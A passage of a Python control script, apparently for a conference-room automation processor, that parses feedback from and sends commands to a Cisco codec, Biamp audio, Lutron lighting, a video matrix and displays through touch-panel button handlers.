CISCO_DATA['ConexModule'] = False\n            BTN['LANCisco'].SetState(0)\n            ## Disconnect the IP Socket\n            CISCO.Disconnect()\n\n    elif command == 'CallStatus':\n        print(str(qualifier) + ' ' + str(value)) ## qualifier is a dict, so cast before concatenating\n        CISCO_DATA['Call'] = value\n\n    elif command == 'PresentationMode':\n        print(value)\n        CISCO_DATA['Content'] = value\n\n    elif command == 'Standby':\n        print(value)\n        if value == 'Activate':\n            CISCO_DATA['Power'] = True\n        else:\n            CISCO_DATA['Power'] = False\n\n    elif command == 'AutoAnswer':\n        if value == 'On':\n            CISCO_DATA['AutoAnswer'] = True\n            BTN['VCAutoAn'].SetState(1)\n        elif value == 'Off':\n            CISCO_DATA['AutoAnswer'] = False\n            BTN['VCAutoAn'].SetState(0)\n\n    elif command == 'Volume':\n        print(value)\n        LVL['VC'].SetLevel(value) ## Send volume value to Level Bar\n        CISCO_DATA['Volume'] = value ## Store volume value in dictionary\n    pass\n\ndef biamp_parsing(command, value, qualifier):\n    \"\"\"Retrieve the Real Information of the Device \"\"\"\n    if command == 'ConnectionStatus':\n        print('Biamp 
Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n BIAMP_DATA['ConexModule'] = True\n BTN['LANBiamp'].SetState(1)\n else:\n BIAMP_DATA['ConexModule'] = False\n BTN['LANBiamp'].SetState(0)\n ## Turn Off feedback Buttons\n LVL['Spk'].SetLevel(-100)\n ## Disconnect the IP Socket\n BIAMP.Disconnect()\n\n elif command == 'MuteControl':\n print(str(qualifier) + ' ' + str(value))\n\n if qualifier['Instance Tag'] == 'lvl_spk':\n if value == 'On':\n BIAMP_DATA['MuteSpk'] = True\n BTN['XSpk'].SetState(1)\n elif value == 'Off':\n BIAMP_DATA['MuteSpk'] = False\n BTN['XSpk'].SetState(0)\n\n elif qualifier['Instance Tag'] == 'lvl_vcrx':\n if value == 'On':\n BIAMP_DATA['MuteVCRx'] = True\n BTN['XVC'].SetState(1)\n elif value == 'Off':\n BIAMP_DATA['MuteVCRx'] = False\n BTN['XVC'].SetState(0)\n\n elif qualifier['Instance Tag'] == 'mute_mix':\n if value == 'On':\n BIAMP_DATA['Mute_Mics'] = True\n BTN['XMics'].SetState(1)\n elif value == 'Off':\n BIAMP_DATA['Mute_Mics'] = False\n BTN['XMics'].SetState(0)\n\n elif command == 'LevelControl':\n print(str(qualifier) + ' ' + str(value))\n value = int(value) ## Convert reported volume to Integer\n LVL['Spk'].SetLevel(value) ## Send volume value to Level Bar\n BIAMP_DATA['lvl_spk'] = value ## Store volume value in dictionary\n pass\n\ndef lutron_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Lutron Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n LUTRON_DATA['ConexModule'] = True\n BTN['LANLutron'].SetState(1)\n else:\n LUTRON_DATA['ConexModule'] = False\n BTN['LANLutron'].SetState(0)\n ## Disconnect the IP Socket\n LUTRON.Disconnect()\n pass\n\ndef somfy_parsing(command, value, qualifier):\n \"\"\"Retrieve the Real Information of the Device \"\"\"\n if command == 'ConnectionStatus':\n print('Somfy Module Conex status: {}'.format(value))\n\n if value == 'Connected':\n SOMFY_DATA['ConexModule'] = True\n BTN['232Somfy'].SetState(1)\n else:\n SOMFY_DATA['ConexModule'] = False\n BTN['232Somfy'].SetState(0)\n\n pass\n## EVENT FUNCTIONS ----------------------------------------------------------------\n## This functions report a 'Online' / 'Offline' status after to send a Connect()\n## CAUTION: If you never make a Connect(), the Module never work with Subscriptions\n@event(MATRIX, 'Connected')\n@event(MATRIX, 'Disconnected')\ndef matrix_conex_event(interface, state):\n \"\"\"MATRIX CONNECT() STATUS \"\"\"\n print('Matrix Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANMatrix'].SetState(1)\n MATRIX_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_matrix()\n update_matrix()\n if state == 'Disconnected':\n BTN['LANMatrix'].SetState(0)\n MATRIX_DATA['ConexEvent'] = False\n trying_matrix()\n pass\n\n@event(BRIDGE, 'Connected')\n@event(BRIDGE, 'Disconnected')\ndef bridge_conex_event(interface, state):\n \"\"\"BRIDGE CONNECT() STATUS \"\"\"\n print('Bridge Conex Event: ' + state)\n if state == 'Connected':\n BTN['LanBridge'].SetState(1)\n BRIDGE_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_bridge()\n update_bridge()\n if state == 'Disconnected':\n BTN['LanBridge'].SetState(0)\n BRIDGE_DATA['ConexEvent'] = False\n trying_bridge()\n pass\n\n@event(CISCO, 'Connected')\n@event(CISCO, 'Disconnected')\ndef cisco_conex_event(interface, state):\n \"\"\"CISCO CONNECT() STATUS \"\"\"\n print('Cisco Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANCisco'].SetState(1)\n 
CISCO_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_cisco()\n update_cisco()\n if state == 'Disconnected':\n BTN['LANCisco'].SetState(0)\n CISCO_DATA['ConexEvent'] = False\n trying_cisco()\n pass\n\n@event(BIAMP, 'Connected')\n@event(BIAMP, 'Disconnected')\ndef biamp_conex_event(interface, state):\n \"\"\"DEVICE CONNECT() STATUS \"\"\"\n print('Biamp Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANBiamp'].SetState(1)\n BIAMP_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_biamp()\n update_biamp()\n if state == 'Disconnected':\n BTN['LANBiamp'].SetState(0)\n BIAMP_DATA['ConexEvent'] = False\n trying_biamp()\n pass\n\n@event(LUTRON, 'Connected')\n@event(LUTRON, 'Disconnected')\ndef lutron_conex_event(interface, state):\n \"\"\"DEVICE CONNECT() STATUS \"\"\"\n print('Lutron Conex Event: ' + state)\n if state == 'Connected':\n BTN['LANLutron'].SetState(1)\n LUTRON_DATA['ConexEvent'] = True\n ## Send & Query Information\n subscribe_lutron()\n update_lutron()\n if state == 'Disconnected':\n BTN['LANLutron'].SetState(0)\n LUTRON_DATA['ConexEvent'] = False\n trying_lutron()\n pass\n\n## RECURSIVE FUNCTIONS ------------------------------------------------------------\n## Help´s when the device was Off in the first Connect() method when the code starts\ndef trying_matrix():\n \"\"\"Try to make a Connect() to device\"\"\"\n if MATRIX_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Matrix')\n MATRIX.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_matrix = Wait(5, trying_matrix)\n\ndef trying_bridge():\n \"\"\"Try to make a Connect() to device\"\"\"\n if BRIDGE_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Bridge')\n BRIDGE.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_bridge = Wait(5, trying_bridge)\n\ndef trying_cisco():\n \"\"\"Try to make a Connect() to device\"\"\"\n if CISCO_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Cisco')\n CISCO.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_cisco = Wait(5, trying_cisco)\n\ndef trying_biamp():\n \"\"\"Try to make a Connect() to device\"\"\"\n if BIAMP_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Biamp')\n BIAMP.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_biamp = Wait(5, trying_biamp)\n\ndef trying_lutron():\n \"\"\"Try to make a Connect() to device\"\"\"\n if LUTRON_DATA['ConexEvent'] == False:\n print('Tryng to make a Connect() in Lutron')\n LUTRON.Connect(4) ## Have 4 seconds to try to connect\n pass\nloop_trying_lutron = Wait(5, trying_lutron)\n\n## RECURSIVE LOOP FUNCTIONS -----------------------------------------------------------\n## This not affect any device\n## This return True / False when no response is received from Module\n## If in 5 times the data is not reported (connectionCounter = 5) from the Update Command\n## Generate 'Connected' / 'Disconnected'\n\ndef update_loop_matrix():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n MATRIX.Update('SignalStatus', {'Input':'1'})\n loop_update_matrix.Restart()\nloop_update_matrix = Wait(12, update_loop_matrix)\n\ndef update_loop_bridge():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n BRIDGE.Update('AutoImage')\n loop_update_bridge.Restart()\nloop_update_bridge = Wait(12, update_loop_bridge)\n\ndef update_loop_cisco():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n 
CISCO.Update('AutoAnswer')\n loop_update_cisco.Restart()\nloop_update_cisco = Wait(12, update_loop_cisco)\n\ndef update_loop_biamp():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n BIAMP.Update('VerboseMode')\n loop_update_biamp.Restart()\nloop_update_biamp = Wait(12, update_loop_biamp)\n\ndef update_loop_lutron():\n \"\"\"Continuos Update Commands to produce Module Connected / Disconnected\"\"\"\n LUTRON.Update('OutputLevel', {'Integration ID':'2'})\n loop_update_lutron.Restart()\nloop_update_lutron = Wait(12, update_loop_lutron)\n\n## DATA DICTIONARIES -----------------------------------------------------------\n## Each dictionary store the real time information of room devices\n## IP\nMATRIX_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n}\n\nBRIDGE_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n ##\n 'InputEDID' : '',\n 'USBHost' : '',\n 'USBTerminal': '',\n 'VideoSend' : None,\n 'VideoSignal': None,\n}\n\nCISCO_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n ##\n 'AutoAnswer' : None,\n 'CallStatus' : '',\n 'Camera' : '',\n 'Dial' : '',\n 'Power' : None,\n 'PresetMode' : '',\n 'Volume' : None,\n}\n\nBIAMP_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n ##\n 'MuteSpk' : None,\n 'MuteVCRx' : None,\n 'Mute_Mics' : None,\n 'lvl_spk' : None,\n}\n\nVOIP_DATA = {\n 'Dial' : '',\n 'DTMF' : False\n}\n\nLUTRON_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n}\n\n## RS-232\nSOMFY_DATA = {\n 'ConexModule': None,\n 'ConexEvent' : None,\n}\n\n## IR-Serial\nLCD1_DATA = {\n 'Input' : '',\n 'Power' : '',\n}\n\nLCD2_DATA = {\n 'Input' : '',\n 'Power' : '',\n}\n## PAGE USER EVENTS ------------------------------------------------------------\n## PAGE Index ------------------------------------------------------------------\n@event(BTN['Index'], 'Pressed')\ndef index_events(button, state):\n \"\"\"User Actions: Touch Index Page\"\"\"\n TLP.ShowPage(PAGE['Main'])\n TLP.ShowPopup(POPUP['Hi'])\n print('Touch Mode: %s' % 'Index')\n pass\n\n## PAGE Main -------------------------------------------------------------------\n@event(BTNPAGE['Main'], BTNSTATE['List'])\ndef main_events(button, state):\n \"\"\"User Actions: Touch Main Page\"\"\"\n if button is BTN['Video'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Video'])\n LBL['Master'].SetText('Seleccionar Display')\n print('Touch Mode: %s' % 'Video')\n\n elif button is BTN['VC'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VC'])\n LBL['Master'].SetText('Control de Videoconferencia')\n print('Touch Mode: %s' % 'VC')\n\n elif button is BTN['Webex'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Webex'])\n LBL['Master'].SetText('Control de Webconferencia')\n print('Touch Mode: %s' % 'Webex')\n\n elif button is BTN['VoIP'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VoIP'])\n LBL['Master'].SetText('Telefonía IP')\n print('Touch Mode: %s' % 'VoIP')\n\n elif button is BTN['Lights'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Lights'])\n LBL['Master'].SetText('Control de Iluminación')\n print('Touch Mode: %s' % 'Lights')\n\n elif button is BTN['Audio'] and state == 'Pressed':\n ## Query Data from Biamp\n update_biamp()\n TLP.ShowPopup(POPUP['Audio'])\n LBL['Master'].SetText('Control de Audio')\n print('Touch Mode: %s' % 'Audio')\n\n elif button is BTN['Status'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['Status'])\n LBL['Master'].SetText('Información de Dispositivos')\n print('Touch Mode: %s' % 'Status')\n\n elif button is BTN['PwrOff'] and state == 'Pressed':\n 
TLP.ShowPopup(POPUP['Power'])\n LBL['Master'].SetText('¿Deseas Apagar el Sistema?')\n print('Touch Mode: %s' % 'PowerOff')\n\n ##Turn On the feedbak of last pressed button\n BTNGROUP['Main'].SetCurrent(button)\n pass\n\n## PAGE Video ------------------------------------------------------------------\n@event(BTNPAGE['Video'], BTNSTATE['List'])\ndef video_events(button, state):\n \"\"\"User Actions: Touch Video Page\"\"\"\n if button is BTN['DisplayL'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['LCD1'])\n LBL['Master'].SetText('Control de Pantalla Izquierda')\n print('Video Mode: %s' % 'Display L')\n\n elif button is BTN['DisplayR'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['LCD2'])\n LBL['Master'].SetText('Control de Pantalla Derecha')\n print('Video Mode: %s' % 'Display R')\n pass\n\n## PAGE Display L --------------------------------------------------------------\n@event(BTNPAGE['LCD1'], BTNSTATE['List'])\ndef display_l_events(button, state):\n \"\"\"User Actions: Touch LCD-L Page\"\"\"\n if button is BTN['LHDMI'] and state == 'Pressed':\n ## HDMI to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'HDMI')\n\n elif button is BTN['LVGA'] and state == 'Pressed':\n ## VGA to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'VGA')\n\n elif button is BTN['LPTZ'] and state == 'Pressed':\n ## PTZ to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'PTZ')\n\n elif button is BTN['LShare'] and state == 'Pressed':\n ## ShareLink to Display Left - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'1', 'Tie Type':'Video'})\n print('Button Pressed - LCD L: %s' % 'ShareLink')\n\n elif button is BTN['LPwrOn'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD L: %s' % 'PowerOn')\n\n elif button is BTN['LPwrOff'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD L: %s' % 'PowerOff')\n\n elif button is BTN['LBack'] and state == 'Pressed':\n ## Hide actual POPUP and show the Display Selection POPUP\n TLP.ShowPopup(POPUP['Video'])\n print('Button Pressed - LCD L: %s' % 'Back')\n pass\n\n## PAGE Display R --------------------------------------------------------------\n@event(BTNPAGE['LCD2'], BTNSTATE['List'])\ndef display_r_events(button, state):\n \"\"\"User Actions: Touch LCD-R Page\"\"\"\n if button is BTN['RHDMI'] and state == 'Pressed':\n ## HDMI to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'HDMI')\n\n elif button is BTN['RVGA'] and state == 'Pressed':\n ## VGA to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'VGA')\n\n elif button is BTN['RPTZ'] and state == 'Pressed':\n ## PTZ to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'PTZ')\n\n elif button is BTN['RShare'] and state == 'Pressed':\n ## ShareLink to Display Right - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'2', 'Tie Type':'Video'})\n print('Button Pressed - LCD R: %s' % 'ShareLink')\n\n elif 
button is BTN['RPwrOn'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD R: %s' % 'PowerOn')\n\n elif button is BTN['RPwrOff'] and state == 'Pressed':\n ## The system send the command action directly\n print('Button Pressed - LCD R: %s' % 'PowerOff')\n\n elif button is BTN['RBack'] and state == 'Pressed':\n ## Hide actual POPUP and show the Display Selection POPUP\n TLP.ShowPopup(POPUP['Video'])\n print('Button Pressed - LCD R: %s' % 'Back')\n pass\n\n## PAGE VC ---------------------------------------------------------------------\n@event(BTNPAGE['VCCall'], BTNSTATE['List'])\ndef vc_call_events(button, state):\n \"\"\"User Actions: Touch VC Page\"\"\"\n if button is BTN['VCCall'] and state == 'Pressed':\n ##--This button dial the number typed on the touch panel (Cisco VC)\n CISCO.Set('Hook', 'Dial', {'Protocol':'H323', 'Number': CISCO_DATA['Dial']})\n print('Button Pressed - VC: %s' % 'Call')\n\n elif button is BTN['VCHangup'] and state == 'Pressed':\n ##--This button hangs up all active calls (Cisco VC)\n CISCO.Set('Hook', 'Disconnect All', {'Protocol':'H323'})\n print('Button Pressed - VC: %s' % 'Hangup')\n pass\n\n## This function is called when the user press a Dial Button\n## This function add or remove data from the panel Dial Number\ndef dialer_vc(btn_name):\n \"\"\"User Actions: Touch VC Page\"\"\"\n global dialerVC\n\n if btn_name == 'Delete': #If the user push 'Delete' button\n dialerVC = dialerVC[:-1] #Remove the last char of the string\n CISCO_DATA['Dial'] = dialerVC #Asign the string to the data dictionary\n LBL['VCDial'].SetText(dialerVC) #Send the string to GUI Label\n\n else: #If the user push a [*#0-9] button\n number = str(btn_name[4]) #Extract the valid character of BTN name\n dialerVC += number #Append the last char to the string\n CISCO_DATA['Dial'] = dialerVC #Asign the string to the data dictionary\n LBL['VCDial'].SetText(dialerVC) #Send the string to GUI Label\n pass\n\n@event(BTNPAGE['VCDial'], BTNSTATE['List'])\ndef vc_dial_events(button, state):\n \"\"\"User Actions: Touch VC Page\"\"\"\n ## All the VC Dial Buttons pressed come in button variable\n if state == 'Pressed' or state == 'Repeated':\n print('Button Pressed - VC: %s' % button.Name)\n dialer_vc(button.Name) #Recall a validation function\n button.SetState(1)\n else:\n button.SetState(0)\n pass\n\n@event(BTNPAGE['VCOpt'], BTNSTATE['List'])\ndef vc_opt_events(button, state):\n \"\"\"User Actions: Touch VC Page\"\"\"\n\n ## VC Options: Content Control\n if button is BTN['VCEnviar'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VC_PC'])\n BTN['VCEnviar'].SetState(1)\n print('Button Pressed - VC: %s' % 'Content')\n else:\n BTN['VCEnviar'].SetState(0)\n\n ## VC Options: Camera Control\n if button is BTN['VCCamara'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VC_Cam'])\n BTN['VCCamara'].SetState(1)\n print('Button Pressed - VC: %s' % 'Camera')\n else:\n BTN['VCCamara'].SetState(0)\n\n ## VC Options: AutoAnswer\n if button is BTN['VCAutoAn'] and state == 'Pressed':\n #\n if CISCO_DATA['AutoAnswer'] == True:\n CISCO.Set('AutoAnswer', 'Off')\n\n elif CISCO_DATA['AutoAnswer'] == False:\n CISCO.Set('AutoAnswer', 'On')\n print('Button Pressed - VC: %s' % 'AutoAnswer')\n pass\n\n## PAGE VC Content -------------------------------------------------------------\n@event(BTNPAGE['VCPC'], BTNSTATE['List'])\ndef vc_cam_content_sources(button, state):\n \"\"\"User Actions: Touch VC Content Page\"\"\"\n\n if button is BTN['VCHDMI'] and state == 'Pressed':\n ## HDMI to 
Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'HDMI')\n\n elif button is BTN['VCVGA'] and state == 'Pressed':\n ## VGA to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'VGA')\n\n elif button is BTN['VCPTZ'] and state == 'Pressed':\n ## PTZ to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'PTZ')\n\n elif button is BTN['VCShare'] and state == 'Pressed':\n ## ShareLink to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'ClickShare')\n\n elif button is BTN['VCBack2'] and state == 'Pressed':\n ## Hide VC Content POPUP and Show the main VC POPUP\n TLP.ShowPopup(POPUP['VC'])\n print('Button Pressed - VC Share: %s' % 'Back')\n\n elif button is BTN['VCSend'] and state == 'Pressed':\n ## Play - Share graphics presentation\n CISCO.Set('Presentation', '1')\n print('Button Pressed - VC Share: %s' % 'Send')\n\n elif button is BTN['VCStop'] and state == 'Pressed':\n ## Stop - Sharing graphics\n CISCO.Set('Presentation', 'Stop')\n print('Button Pressed - VC Share: %s' % 'Stop')\n pass\n\n## PAGE VC Camera --------------------------------------------------------------\n@event(BTNPAGE['VCCam'], BTNSTATE['List'])\ndef vc_nav_events(button, state):\n \"\"\"User Actions: Touch VC Camera Page\"\"\"\n if button is BTN['VCUp']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Up', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Up')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Up')\n print('Cam Remota - Cisco: %s' % 'Cam Up')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCLeft']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Left', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Left')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Left')\n print('Cam Remota - Cisco: %s' % 'Cam Left')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCDown']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Down', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Down')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Down')\n print('Cam Remota - Cisco: %s' % 'Cam Down')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam 
Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCRight']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Right', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Right')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Right')\n print('Cam Remota - Cisco: %s' % 'Cam Right')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCZoom1']: #+\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'In', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Zoom+')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'In')\n print('Cam Remota - Cisco: %s' % 'Cam Zoom+')\n BTN['VCZoom1'].SetState(1)\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n BTN['VCZoom1'].SetState(0)\n #--\n elif button is BTN['VCZoom2']: #-\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'Out', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Zoom-')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'Out')\n print('Cam Remota - Cisco: %s' % 'Cam Zoom-')\n BTN['VCZoom2'].SetState(1)\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n BTN['VCZoom2'].SetState(0)\n #--\n if button is BTN['VCLocal'] and state == 'Pressed':\n CISCO_DATA['Camera'] = 'Local'\n BTNGROUP['VCCam'].SetCurrent(BTN['VCLocal'])\n print('Button Pressed - Cisco: %s' % 'Cam Local')\n #--\n elif button is BTN['VCRemote'] and state == 'Pressed':\n CISCO_DATA['Camera'] = 'Remote'\n BTNGROUP['VCCam'].SetCurrent(BTN['VCRemote'])\n print('Button Pressed - Cisco: %s' % 'Cam Remote')\n pass\n\n\n@event(BTNPAGE['VCPre'], BTNSTATE['List'])\ndef vc_cam_events(button, state):\n \"\"\"User Actions: Touch VC Camera Page\"\"\"\n if button is BTN['VCP1'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '1')\n print('Recall Local Preset Cisco: %s' % '1')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '1')\n print('Save Local Preset Cisco: %s' % '1')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '1')\n print('Recall Remote Preset Cisco: %s' % '1')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '1')\n print('Save Remote Preset Cisco: %s' % '1')\n #--\n elif button is BTN['VCP2'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '2')\n print('Recall Local Preset Cisco: %s' % '2')\n elif 
CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '2')\n print('Save Local Preset Cisco: %s' % '2')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '2')\n print('Recall Remote Preset Cisco: %s' % '2')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '2')\n print('Save Remote Preset Cisco: %s' % '2')\n #--\n elif button is BTN['VCP3'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '3')\n print('Recall Local Preset Cisco: %s' % '3')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '3')\n print('Save Local Preset Cisco: %s' % '3')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '3')\n print('Recall Remote Preset Cisco: %s' % '3')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '3')\n print('Save Remote Preset Cisco: %s' % '3')\n #--\n elif button is BTN['VCP4'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '4')\n print('Recall Local Preset Cisco: %s' % '4')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '4')\n print('Save Local Preset Cisco: %s' % '4')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '4')\n print('Recall Remote Preset Cisco: %s' % '4')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '4')\n print('Save Remote Preset Cisco: %s' % '4')\n #--\n elif button is BTN['VCP5'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n 